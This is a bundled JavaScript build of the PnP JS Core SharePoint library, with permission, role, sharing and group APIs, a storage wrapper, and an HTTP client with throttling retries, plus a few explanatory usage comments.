*/ PermissionKind[PermissionKind["FullMask"] = 65] = "FullMask"; })(PermissionKind = exports.PermissionKind || (exports.PermissionKind = {})); var PrincipalType; (function (PrincipalType) { PrincipalType[PrincipalType["None"] = 0] = "None"; PrincipalType[PrincipalType["User"] = 1] = "User"; PrincipalType[PrincipalType["DistributionList"] = 2] = "DistributionList"; PrincipalType[PrincipalType["SecurityGroup"] = 4] = "SecurityGroup"; PrincipalType[PrincipalType["SharePointGroup"] = 8] = "SharePointGroup"; PrincipalType[PrincipalType["All"] = 15] = "All"; })(PrincipalType = exports.PrincipalType || (exports.PrincipalType = {})); var PrincipalSource; (function (PrincipalSource) { PrincipalSource[PrincipalSource["None"] = 0] = "None"; PrincipalSource[PrincipalSource["UserInfoList"] = 1] = "UserInfoList"; PrincipalSource[PrincipalSource["Windows"] = 2] = "Windows"; PrincipalSource[PrincipalSource["MembershipProvider"] = 4] = "MembershipProvider"; PrincipalSource[PrincipalSource["RoleProvider"] = 8] = "RoleProvider"; PrincipalSource[PrincipalSource["All"] = 15] = "All"; })(PrincipalSource = exports.PrincipalSource || (exports.PrincipalSource = {})); var RoleType; (function (RoleType) { RoleType[RoleType["None"] = 0] = "None"; RoleType[RoleType["Guest"] = 1] = "Guest"; RoleType[RoleType["Reader"] = 2] = "Reader"; RoleType[RoleType["Contributor"] = 3] = "Contributor"; RoleType[RoleType["WebDesigner"] = 4] = "WebDesigner"; RoleType[RoleType["Administrator"] = 5] = "Administrator"; })(RoleType = exports.RoleType || (exports.RoleType = {})); var PageType; (function (PageType) { PageType[PageType["Invalid"] = -1] = "Invalid"; PageType[PageType["DefaultView"] = 0] = "DefaultView"; PageType[PageType["NormalView"] = 1] = "NormalView"; PageType[PageType["DialogView"] = 2] = "DialogView"; PageType[PageType["View"] = 3] = "View"; PageType[PageType["DisplayForm"] = 4] = "DisplayForm"; PageType[PageType["DisplayFormDialog"] = 5] = "DisplayFormDialog"; PageType[PageType["EditForm"] = 6] = "EditForm"; PageType[PageType["EditFormDialog"] = 7] = "EditFormDialog"; PageType[PageType["NewForm"] = 8] = "NewForm"; PageType[PageType["NewFormDialog"] = 9] = "NewFormDialog"; PageType[PageType["SolutionForm"] = 10] = "SolutionForm"; PageType[PageType["PAGE_MAXITEMS"] = 11] = "PAGE_MAXITEMS"; })(PageType = exports.PageType || (exports.PageType = {})); var SharingLinkKind; (function (SharingLinkKind) { /** * Uninitialized link */ SharingLinkKind[SharingLinkKind["Uninitialized"] = 0] = "Uninitialized"; /** * Direct link to the object being shared */ SharingLinkKind[SharingLinkKind["Direct"] = 1] = "Direct"; /** * Organization-shareable link to the object being shared with view permissions */ SharingLinkKind[SharingLinkKind["OrganizationView"] = 2] = "OrganizationView"; /** * Organization-shareable link to the object being shared with edit permissions */ SharingLinkKind[SharingLinkKind["OrganizationEdit"] = 3] = "OrganizationEdit"; /** * View only anonymous link */ SharingLinkKind[SharingLinkKind["AnonymousView"] = 4] = "AnonymousView"; /** * Read/Write anonymous link */ SharingLinkKind[SharingLinkKind["AnonymousEdit"] = 5] = "AnonymousEdit"; /** * Flexible sharing Link where properties can change without affecting link URL */ SharingLinkKind[SharingLinkKind["Flexible"] = 6] = "Flexible"; })(SharingLinkKind = exports.SharingLinkKind || (exports.SharingLinkKind = {})); ; /** * Indicates the role of the sharing link */ var SharingRole; (function (SharingRole) { SharingRole[SharingRole["None"] = 0] = "None"; 
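// Note (added comment): PrincipalType and PrincipalSource above are bit flags,
// so individual values can be combined with bitwise OR, e.g.:
//
//   var scope = PrincipalType.User | PrincipalType.SecurityGroup; // 1 | 4 === 5
//   // PrincipalType.All (15) is the combination of all four flags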
SharingRole[SharingRole["View"] = 1] = "View"; SharingRole[SharingRole["Edit"] = 2] = "Edit"; SharingRole[SharingRole["Owner"] = 3] = "Owner"; })(SharingRole = exports.SharingRole || (exports.SharingRole = {})); var SharingOperationStatusCode; (function (SharingOperationStatusCode) { /** * The share operation completed without errors. */ SharingOperationStatusCode[SharingOperationStatusCode["CompletedSuccessfully"] = 0] = "CompletedSuccessfully"; /** * The share operation completed and generated requests for access. */ SharingOperationStatusCode[SharingOperationStatusCode["AccessRequestsQueued"] = 1] = "AccessRequestsQueued"; /** * The share operation failed as there were no resolved users. */ SharingOperationStatusCode[SharingOperationStatusCode["NoResolvedUsers"] = -1] = "NoResolvedUsers"; /** * The share operation failed due to insufficient permissions. */ SharingOperationStatusCode[SharingOperationStatusCode["AccessDenied"] = -2] = "AccessDenied"; /** * The share operation failed when attempting a cross site share, which is not supported. */ SharingOperationStatusCode[SharingOperationStatusCode["CrossSiteRequestNotSupported"] = -3] = "CrossSiteRequestNotSupported"; /** * The sharing operation failed due to an unknown error. */ SharingOperationStatusCode[SharingOperationStatusCode["UnknowError"] = -4] = "UnknowError"; /** * The text you typed is too long. Please shorten it. */ SharingOperationStatusCode[SharingOperationStatusCode["EmailBodyTooLong"] = -5] = "EmailBodyTooLong"; /** * The maximum number of unique scopes in the list has been exceeded. */ SharingOperationStatusCode[SharingOperationStatusCode["ListUniqueScopesExceeded"] = -6] = "ListUniqueScopesExceeded"; /** * The share operation failed because a sharing capability is disabled in the site. */ SharingOperationStatusCode[SharingOperationStatusCode["CapabilityDisabled"] = -7] = "CapabilityDisabled"; /** * The specified object for the share operation is not supported. */ SharingOperationStatusCode[SharingOperationStatusCode["ObjectNotSupported"] = -8] = "ObjectNotSupported"; /** * A SharePoint group cannot contain another SharePoint group. 
*/ SharingOperationStatusCode[SharingOperationStatusCode["NestedGroupsNotSupported"] = -9] = "NestedGroupsNotSupported"; })(SharingOperationStatusCode = exports.SharingOperationStatusCode || (exports.SharingOperationStatusCode = {})); var SPSharedObjectType; (function (SPSharedObjectType) { SPSharedObjectType[SPSharedObjectType["Unknown"] = 0] = "Unknown"; SPSharedObjectType[SPSharedObjectType["File"] = 1] = "File"; SPSharedObjectType[SPSharedObjectType["Folder"] = 2] = "Folder"; SPSharedObjectType[SPSharedObjectType["Item"] = 3] = "Item"; SPSharedObjectType[SPSharedObjectType["List"] = 4] = "List"; SPSharedObjectType[SPSharedObjectType["Web"] = 5] = "Web"; SPSharedObjectType[SPSharedObjectType["Max"] = 6] = "Max"; })(SPSharedObjectType = exports.SPSharedObjectType || (exports.SPSharedObjectType = {})); var SharingDomainRestrictionMode; (function (SharingDomainRestrictionMode) { SharingDomainRestrictionMode[SharingDomainRestrictionMode["None"] = 0] = "None"; SharingDomainRestrictionMode[SharingDomainRestrictionMode["AllowList"] = 1] = "AllowList"; SharingDomainRestrictionMode[SharingDomainRestrictionMode["BlockList"] = 2] = "BlockList"; })(SharingDomainRestrictionMode = exports.SharingDomainRestrictionMode || (exports.SharingDomainRestrictionMode = {})); ; /***/ }), /* 14 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var collections_1 = __webpack_require__(6); var pnplibconfig_1 = __webpack_require__(4); /** * A wrapper class to provide a consistent interface to browser based storage * */ var PnPClientStorageWrapper = (function () { /** * Creates a new instance of the PnPClientStorageWrapper class * * @constructor */ function PnPClientStorageWrapper(store, defaultTimeoutMinutes) { this.store = store; this.defaultTimeoutMinutes = defaultTimeoutMinutes; this.defaultTimeoutMinutes = (defaultTimeoutMinutes === void 0) ? 
-1 : defaultTimeoutMinutes; this.enabled = this.test(); } /** * Get a value from storage, or null if that value does not exist * * @param key The key whose value we want to retrieve */ PnPClientStorageWrapper.prototype.get = function (key) { if (!this.enabled) { return null; } var o = this.store.getItem(key); if (o == null) { return null; } var persistable = JSON.parse(o); if (new Date(persistable.expiration) <= new Date()) { this.delete(key); return null; } else { return persistable.value; } }; /** * Adds a value to the underlying storage * * @param key The key to use when storing the provided value * @param o The value to store * @param expire Optional, if provided the expiration of the item, otherwise the default is used */ PnPClientStorageWrapper.prototype.put = function (key, o, expire) { if (this.enabled) { this.store.setItem(key, this.createPersistable(o, expire)); } }; /** * Deletes a value from the underlying storage * * @param key The key of the pair we want to remove from storage */ PnPClientStorageWrapper.prototype.delete = function (key) { if (this.enabled) { this.store.removeItem(key); } }; /** * Gets an item from the underlying storage, or adds it if it does not exist using the supplied getter function * * @param key The key to use when storing the provided value * @param getter A function which will upon execution provide the desired value * @param expire Optional, if provided the expiration of the item, otherwise the default is used */ PnPClientStorageWrapper.prototype.getOrPut = function (key, getter, expire) { var _this = this; if (!this.enabled) { return getter(); } return new Promise(function (resolve) { var o = _this.get(key); if (o == null) { getter().then(function (d) { _this.put(key, d, expire); resolve(d); }); } else { resolve(o); } }); }; /** * Used to determine if the wrapped storage is available currently */ PnPClientStorageWrapper.prototype.test = function () { var str = "test"; try { this.store.setItem(str, str); this.store.removeItem(str); return true; } catch (e) { return false; } }; /** * Creates the persistable to store */ PnPClientStorageWrapper.prototype.createPersistable = function (o, expire) { if (typeof expire === "undefined") { // ensure we are by default inline with the global library setting var defaultTimeout = pnplibconfig_1.RuntimeConfig.defaultCachingTimeoutSeconds; if (this.defaultTimeoutMinutes > 0) { defaultTimeout = this.defaultTimeoutMinutes * 60; } expire = util_1.Util.dateAdd(new Date(), "second", defaultTimeout); } return JSON.stringify({ expiration: expire, value: o }); }; return PnPClientStorageWrapper; }()); exports.PnPClientStorageWrapper = PnPClientStorageWrapper; /** * A thin implementation of in-memory storage for use in nodejs */ var MemoryStorage = (function () { function MemoryStorage(_store) { if (_store === void 0) { _store = new collections_1.Dictionary(); } this._store = _store; } Object.defineProperty(MemoryStorage.prototype, "length", { get: function () { return this._store.count(); }, enumerable: true, configurable: true }); MemoryStorage.prototype.clear = function () { this._store.clear(); }; MemoryStorage.prototype.getItem = function (key) { return this._store.get(key); }; MemoryStorage.prototype.key = function (index) { return this._store.getKeys()[index]; }; MemoryStorage.prototype.removeItem = function (key) { this._store.remove(key); }; MemoryStorage.prototype.setItem = function (key, data) { this._store.add(key, data); }; return MemoryStorage; }()); /** * A class that will establish wrappers for both local and 
session storage */ var PnPClientStorage = (function () { /** * Creates a new instance of the PnPClientStorage class * * @constructor */ function PnPClientStorage() { this.local = typeof localStorage !== "undefined" ? new PnPClientStorageWrapper(localStorage) : new PnPClientStorageWrapper(new MemoryStorage()); this.session = typeof sessionStorage !== "undefined" ? new PnPClientStorageWrapper(sessionStorage) : new PnPClientStorageWrapper(new MemoryStorage()); } return PnPClientStorage; }()); exports.PnPClientStorage = PnPClientStorage; /***/ }), /* 15 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var digestcache_1 = __webpack_require__(38); var util_1 = __webpack_require__(0); var pnplibconfig_1 = __webpack_require__(4); var exceptions_1 = __webpack_require__(3); var HttpClient = (function () { function HttpClient() { this._impl = pnplibconfig_1.RuntimeConfig.fetchClientFactory(); this._digestCache = new digestcache_1.DigestCache(this); } HttpClient.prototype.fetch = function (url, options) { var _this = this; if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { cache: "no-cache", credentials: "same-origin" }, true); var headers = new Headers(); // first we add the global headers so they can be overwritten by any passed in locally to this call this.mergeHeaders(headers, pnplibconfig_1.RuntimeConfig.headers); // second we add the local options so we can overwrite the globals this.mergeHeaders(headers, options.headers); // lastly we apply any default headers we need that may not exist if (!headers.has("Accept")) { headers.append("Accept", "application/json"); } if (!headers.has("Content-Type")) { headers.append("Content-Type", "application/json;odata=verbose;charset=utf-8"); } if (!headers.has("X-ClientService-ClientTag")) { headers.append("X-ClientService-ClientTag", "PnPCoreJS:2.0.6-beta.1"); } opts = util_1.Util.extend(opts, { headers: headers }); if (opts.method && opts.method.toUpperCase() !== "GET") { if (!headers.has("X-RequestDigest")) { var index = url.indexOf("_api/"); if (index < 0) { throw new exceptions_1.APIUrlException(); } var webUrl = url.substr(0, index); return this._digestCache.getDigest(webUrl) .then(function (digest) { headers.append("X-RequestDigest", digest); return _this.fetchRaw(url, opts); }); } } return this.fetchRaw(url, opts); }; HttpClient.prototype.fetchRaw = function (url, options) { var _this = this; if (options === void 0) { options = {}; } // here we need to normalize the headers var rawHeaders = new Headers(); this.mergeHeaders(rawHeaders, options.headers); options = util_1.Util.extend(options, { headers: rawHeaders }); var retry = function (ctx) { _this._impl.fetch(url, options).then(function (response) { return ctx.resolve(response); }).catch(function (response) { // grab our current delay var delay = ctx.delay; // Check if request was throttled - http status code 429 // Check is request failed due to server unavailable - http status code 503 if (response.status !== 429 && response.status !== 503) { ctx.reject(response); } // Increment our counters. ctx.delay *= 2; ctx.attempts++; // If we have exceeded the retry count, reject. if (ctx.retryCount <= ctx.attempts) { ctx.reject(response); } // Set our retry timeout for {delay} milliseconds. 
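/* [Editor's usage sketch for the storage wrappers above; not part of the
 * bundled source.] PnPClientStorage hands out a wrapper around localStorage
 * or sessionStorage when available and falls back to the Dictionary-backed
 * MemoryStorage (e.g. under nodejs). getOrPut caches the result of an async
 * getter under a key, honoring the default expiration; the endpoint below is
 * illustrative:
 *
 *   var storage = new PnPClientStorage();
 *   storage.local.getOrPut("web-title", function () {
 *       return fetch("/_api/web/title").then(function (r) { return r.json(); });
 *   }).then(function (data) { console.log(data); });
 */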
setTimeout(util_1.Util.getCtxCallback(_this, retry, ctx), delay); }); }; return new Promise(function (resolve, reject) { var retryContext = { attempts: 0, delay: 100, reject: reject, resolve: resolve, retryCount: 7, }; retry.call(_this, retryContext); }); }; HttpClient.prototype.get = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "GET" }); return this.fetch(url, opts); }; HttpClient.prototype.post = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "POST" }); return this.fetch(url, opts); }; HttpClient.prototype.patch = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "PATCH" }); return this.fetch(url, opts); }; HttpClient.prototype.delete = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "DELETE" }); return this.fetch(url, opts); }; HttpClient.prototype.mergeHeaders = function (target, source) { if (typeof source !== "undefined" && source !== null) { var temp = new Request("", { headers: source }); temp.headers.forEach(function (value, name) { target.append(name, value); }); } }; return HttpClient; }()); exports.HttpClient = HttpClient; ; /***/ }), /* 16 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
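/* [Editor's note on the retry logic above; not part of the bundled source.]
 * fetchRaw retries only on HTTP 429 (throttled) and 503 (unavailable), with
 * exponential backoff: the context starts at { attempts: 0, delay: 100,
 * retryCount: 7 } and the delay doubles after each failed attempt, so the
 * waits run 100, 200, 400, 800, 1600, 3200 ms, roughly 6.3 seconds of
 * backoff in total before the seventh and final attempt is rejected.
 */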
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var queryable_1 = __webpack_require__(1); /** * Describes a collection of content types * */ var ContentTypes = (function (_super) { __extends(ContentTypes, _super); /** * Creates a new instance of the ContentTypes class * * @param baseUrl The url or Queryable which forms the parent of this content types collection */ function ContentTypes(baseUrl, path) { if (path === void 0) { path = "contenttypes"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a ContentType by content type id */ ContentTypes.prototype.getById = function (id) { var ct = new ContentType(this); ct.concat("('" + id + "')"); return ct; }; /** * Adds an existing contenttype to a content type collection * * @param contentTypeId in the following format, for example: 0x010102 */ ContentTypes.prototype.addAvailableContentType = function (contentTypeId) { var _this = this; var postBody = JSON.stringify({ "contentTypeId": contentTypeId, }); return this.clone(ContentTypes, "addAvailableContentType", true).postAs({ body: postBody }).then(function (data) { return { contentType: _this.getById(data.id), data: data, }; }); }; /** * Adds a new content type to the collection * * @param id The desired content type id for the new content type (also determines the parent content type) * @param name The name of the content type * @param description The description of the content type * @param group The group in which to add the content type * @param additionalSettings Any additional settings to provide when creating the content type * */ ContentTypes.prototype.add = function (id, name, description, group, additionalSettings) { var _this = this; if (description === void 0) { description = ""; } if (group === void 0) { group = "Custom Content Types"; } if (additionalSettings === void 0) { additionalSettings = {}; } var postBody = JSON.stringify(util_1.Util.extend({ "Description": description, "Group": group, "Id": { "StringValue": id }, "Name": name, "__metadata": { "type": "SP.ContentType" }, }, additionalSettings)); return this.post({ body: postBody }).then(function (data) { return { contentType: _this.getById(data.id), data: data }; }); }; return ContentTypes; }(queryable_1.QueryableCollection)); exports.ContentTypes = ContentTypes; /** * Describes a single ContentType instance * */ var ContentType = (function (_super) { __extends(ContentType, _super); function ContentType() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(ContentType.prototype, "fieldLinks", { /** * Gets the column (also known as field) references in the content type. */ get: function () { return new FieldLinks(this); }, enumerable: true, configurable: true }); Object.defineProperty(ContentType.prototype, "fields", { /** * Gets a value that specifies the collection of fields for the content type. */ get: function () { return new queryable_1.QueryableCollection(this, "fields"); }, enumerable: true, configurable: true }); Object.defineProperty(ContentType.prototype, "parent", { /** * Gets the parent content type of the content type. */ get: function () { return new ContentType(this, "parent"); }, enumerable: true, configurable: true }); Object.defineProperty(ContentType.prototype, "workflowAssociations", { /** * Gets a value that specifies the collection of workflow associations for the content type. 
*/ get: function () { return new queryable_1.QueryableCollection(this, "workflowAssociations"); }, enumerable: true, configurable: true }); /** * Delete this content type */ ContentType.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return ContentType; }(queryable_1.QueryableInstance)); exports.ContentType = ContentType; /** * Represents a collection of field link instances */ var FieldLinks = (function (_super) { __extends(FieldLinks, _super); /** * Creates a new instance of the ContentType class * * @param baseUrl The url or Queryable which forms the parent of this content type instance */ function FieldLinks(baseUrl, path) { if (path === void 0) { path = "fieldlinks"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a FieldLink by GUID id * * @param id The GUID id of the field link */ FieldLinks.prototype.getById = function (id) { var fl = new FieldLink(this); fl.concat("(guid'" + id + "')"); return fl; }; return FieldLinks; }(queryable_1.QueryableCollection)); exports.FieldLinks = FieldLinks; /** * Represents a field link instance */ var FieldLink = (function (_super) { __extends(FieldLink, _super); function FieldLink() { return _super !== null && _super.apply(this, arguments) || this; } return FieldLink; }(queryable_1.QueryableInstance)); exports.FieldLink = FieldLink; /***/ }), /* 17 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var sitegroups_1 = __webpack_require__(18); var util_1 = __webpack_require__(0); /** * Describes a set of role assignments for the current scope * */ var RoleAssignments = (function (_super) { __extends(RoleAssignments, _super); /** * Creates a new instance of the RoleAssignments class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function RoleAssignments(baseUrl, path) { if (path === void 0) { path = "roleassignments"; } return _super.call(this, baseUrl, path) || this; } /** * Adds a new role assignment with the specified principal and role definitions to the collection. * * @param principalId The ID of the user or group to assign permissions to * @param roleDefId The ID of the role definition that defines the permissions to assign * */ RoleAssignments.prototype.add = function (principalId, roleDefId) { return this.clone(RoleAssignments, "addroleassignment(principalid=" + principalId + ", roledefid=" + roleDefId + ")", true).post(); }; /** * Removes the role assignment with the specified principal and role definition from the collection * * @param principalId The ID of the user or group in the role assignment. * @param roleDefId The ID of the role definition in the role assignment * */ RoleAssignments.prototype.remove = function (principalId, roleDefId) { return this.clone(RoleAssignments, "removeroleassignment(principalid=" + principalId + ", roledefid=" + roleDefId + ")", true).post(); }; /** * Gets the role assignment associated with the specified principal ID from the collection. 
* * @param id The id of the role assignment */ RoleAssignments.prototype.getById = function (id) { var ra = new RoleAssignment(this); ra.concat("(" + id + ")"); return ra; }; return RoleAssignments; }(queryable_1.QueryableCollection)); exports.RoleAssignments = RoleAssignments; var RoleAssignment = (function (_super) { __extends(RoleAssignment, _super); function RoleAssignment() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(RoleAssignment.prototype, "groups", { get: function () { return new sitegroups_1.SiteGroups(this, "groups"); }, enumerable: true, configurable: true }); Object.defineProperty(RoleAssignment.prototype, "bindings", { /** * Get the role definition bindings for this role assignment * */ get: function () { return new RoleDefinitionBindings(this); }, enumerable: true, configurable: true }); /** * Delete this role assignment * */ RoleAssignment.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return RoleAssignment; }(queryable_1.QueryableInstance)); exports.RoleAssignment = RoleAssignment; var RoleDefinitions = (function (_super) { __extends(RoleDefinitions, _super); /** * Creates a new instance of the RoleDefinitions class * * @param baseUrl The url or Queryable which forms the parent of this fields collection * @param path * */ function RoleDefinitions(baseUrl, path) { if (path === void 0) { path = "roledefinitions"; } return _super.call(this, baseUrl, path) || this; } /** * Gets the role definition with the specified ID from the collection. * * @param id The ID of the role definition. * */ RoleDefinitions.prototype.getById = function (id) { return new RoleDefinition(this, "getById(" + id + ")"); }; /** * Gets the role definition with the specified name. * * @param name The name of the role definition. * */ RoleDefinitions.prototype.getByName = function (name) { return new RoleDefinition(this, "getbyname('" + name + "')"); }; /** * Gets the role definition with the specified type. * * @param name The name of the role definition. 
* */ RoleDefinitions.prototype.getByType = function (roleTypeKind) { return new RoleDefinition(this, "getbytype(" + roleTypeKind + ")"); }; /** * Create a role definition * * @param name The new role definition's name * @param description The new role definition's description * @param order The order in which the role definition appears * @param basePermissions The permissions mask for this role definition * */ RoleDefinitions.prototype.add = function (name, description, order, basePermissions) { var _this = this; var postBody = JSON.stringify({ BasePermissions: util_1.Util.extend({ __metadata: { type: "SP.BasePermissions" } }, basePermissions), Description: description, Name: name, Order: order, __metadata: { "type": "SP.RoleDefinition" }, }); return this.post({ body: postBody }).then(function (data) { return { data: data, definition: _this.getById(data.Id), }; }); }; return RoleDefinitions; }(queryable_1.QueryableCollection)); exports.RoleDefinitions = RoleDefinitions; var RoleDefinition = (function (_super) { __extends(RoleDefinition, _super); function RoleDefinition() { return _super !== null && _super.apply(this, arguments) || this; } /** * Updates this role definition instance with the supplied properties * * @param properties A plain object hash of values to update for the role definition */ /* tslint:disable no-string-literal */ RoleDefinition.prototype.update = function (properties) { var _this = this; if (properties.hasOwnProperty("BasePermissions")) { properties["BasePermissions"] = util_1.Util.extend({ __metadata: { type: "SP.BasePermissions" } }, properties["BasePermissions"]); } var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.RoleDefinition" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { var retDef = _this; if (properties.hasOwnProperty("Name")) { var parent_1 = _this.getParent(RoleDefinitions, _this.parentUrl, ""); retDef = parent_1.getByName(properties["Name"]); } return { data: data, definition: retDef, }; }); }; /* tslint:enable */ /** * Delete this role definition * */ RoleDefinition.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return RoleDefinition; }(queryable_1.QueryableInstance)); exports.RoleDefinition = RoleDefinition; var RoleDefinitionBindings = (function (_super) { __extends(RoleDefinitionBindings, _super); function RoleDefinitionBindings(baseUrl, path) { if (path === void 0) { path = "roledefinitionbindings"; } return _super.call(this, baseUrl, path) || this; } return RoleDefinitionBindings; }(queryable_1.QueryableCollection)); exports.RoleDefinitionBindings = RoleDefinitionBindings; /***/ }), /* 18 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ?
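/* [Editor's usage sketch; not part of the bundled source.] A common pattern
 * with the role classes above: break inheritance on a securable, look up a
 * role definition, then grant it to a principal. Assumes the public entry
 * point (var pnp = require("sp-pnp-js")); the list title, role name, and
 * principal id are illustrative:
 *
 *   var list = pnp.sp.web.lists.getByTitle("Documents");
 *   list.breakRoleInheritance(false, true)
 *       .then(function () { return pnp.sp.web.roleDefinitions.getByName("Contribute").get(); })
 *       .then(function (def) { return list.roleAssignments.add(12, def.Id); });
 */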
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var siteusers_1 = __webpack_require__(30); var util_1 = __webpack_require__(0); /** * Principal Type enum * */ var PrincipalType; (function (PrincipalType) { PrincipalType[PrincipalType["None"] = 0] = "None"; PrincipalType[PrincipalType["User"] = 1] = "User"; PrincipalType[PrincipalType["DistributionList"] = 2] = "DistributionList"; PrincipalType[PrincipalType["SecurityGroup"] = 4] = "SecurityGroup"; PrincipalType[PrincipalType["SharePointGroup"] = 8] = "SharePointGroup"; PrincipalType[PrincipalType["All"] = 15] = "All"; })(PrincipalType = exports.PrincipalType || (exports.PrincipalType = {})); /** * Describes a collection of site groups * */ var SiteGroups = (function (_super) { __extends(SiteGroups, _super); /** * Creates a new instance of the SiteGroups class * * @param baseUrl The url or Queryable which forms the parent of this group collection */ function SiteGroups(baseUrl, path) { if (path === void 0) { path = "sitegroups"; } return _super.call(this, baseUrl, path) || this; } /** * Adds a new group to the site collection * * @param props The group properties object of property names and values to be set for the group */ SiteGroups.prototype.add = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.Group" } }, properties)); return this.post({ body: postBody }).then(function (data) { return { data: data, group: _this.getById(data.Id), }; }); }; /** * Gets a group from the collection by name * * @param groupName The name of the group to retrieve */ SiteGroups.prototype.getByName = function (groupName) { return new SiteGroup(this, "getByName('" + groupName + "')"); }; /** * Gets a group from the collection by id * * @param id The id of the group to retrieve */ SiteGroups.prototype.getById = function (id) { var sg = new SiteGroup(this); sg.concat("(" + id + ")"); return sg; }; /** * Removes the group with the specified member id from the collection * * @param id The id of the group to remove */ SiteGroups.prototype.removeById = function (id) { return this.clone(SiteGroups, "removeById('" + id + "')", true).post(); };<|fim▁hole|> * * @param loginName The name of the group to remove */ SiteGroups.prototype.removeByLoginName = function (loginName) { return this.clone(SiteGroups, "removeByLoginName('" + loginName + "')", true).post(); }; return SiteGroups; }(queryable_1.QueryableCollection)); exports.SiteGroups = SiteGroups; /** * Describes a single group * */ var SiteGroup = (function (_super) { __extends(SiteGroup, _super); function SiteGroup() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(SiteGroup.prototype, "users", { /** * Gets the users for this group * */ get: function () { return new siteusers_1.SiteUsers(this, "users"); }, enumerable: true, configurable: true }); /** * Updates this group instance with the supplied properties * * @param properties A GroupWriteableProperties object of property names and values to update for the group */ /* tslint:disable no-string-literal */ SiteGroup.prototype.update = function (properties) { var _this = this; var postBody = util_1.Util.extend({ "__metadata": { "type": "SP.Group" } }, properties); return this.post({ body: JSON.stringify(postBody), headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { var retGroup = _this; if 
(properties.hasOwnProperty("Title")) { retGroup = _this.getParent(SiteGroup, _this.parentUrl, "getByName('" + properties["Title"] + "')"); } return { data: data, group: retGroup, }; }); }; return SiteGroup; }(queryable_1.QueryableInstance)); exports.SiteGroup = SiteGroup; /***/ }), /* 19 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); /** * Describes a collection of user custom actions * */ var UserCustomActions = (function (_super) { __extends(UserCustomActions, _super); /** * Creates a new instance of the UserCustomActions class * * @param baseUrl The url or Queryable which forms the parent of this user custom actions collection */ function UserCustomActions(baseUrl, path) { if (path === void 0) { path = "usercustomactions"; } return _super.call(this, baseUrl, path) || this; } /** * Returns the user custom action with the specified id * * @param id The GUID id of the user custom action to retrieve */ UserCustomActions.prototype.getById = function (id) { var uca = new UserCustomAction(this); uca.concat("('" + id + "')"); return uca; }; /** * Creates a user custom action * * @param properties The information object of property names and values which define the new user custom action * */ UserCustomActions.prototype.add = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ __metadata: { "type": "SP.UserCustomAction" } }, properties)); return this.post({ body: postBody }).then(function (data) { return { action: _this.getById(data.Id), data: data, }; }); }; /** * Deletes all user custom actions in the collection * */ UserCustomActions.prototype.clear = function () { return this.clone(UserCustomActions, "clear", true).post(); }; return UserCustomActions; }(queryable_1.QueryableCollection)); exports.UserCustomActions = UserCustomActions; /** * Describes a single user custom action * */ var UserCustomAction = (function (_super) { __extends(UserCustomAction, _super); function UserCustomAction() { return _super !== null && _super.apply(this, arguments) || this; } /** * Updates this user custom action with the supplied properties * * @param properties An information object of property names and values to update for this user custom action */ UserCustomAction.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.UserCustomAction" }, }, properties)); return this.post({ body: postBody, headers: { 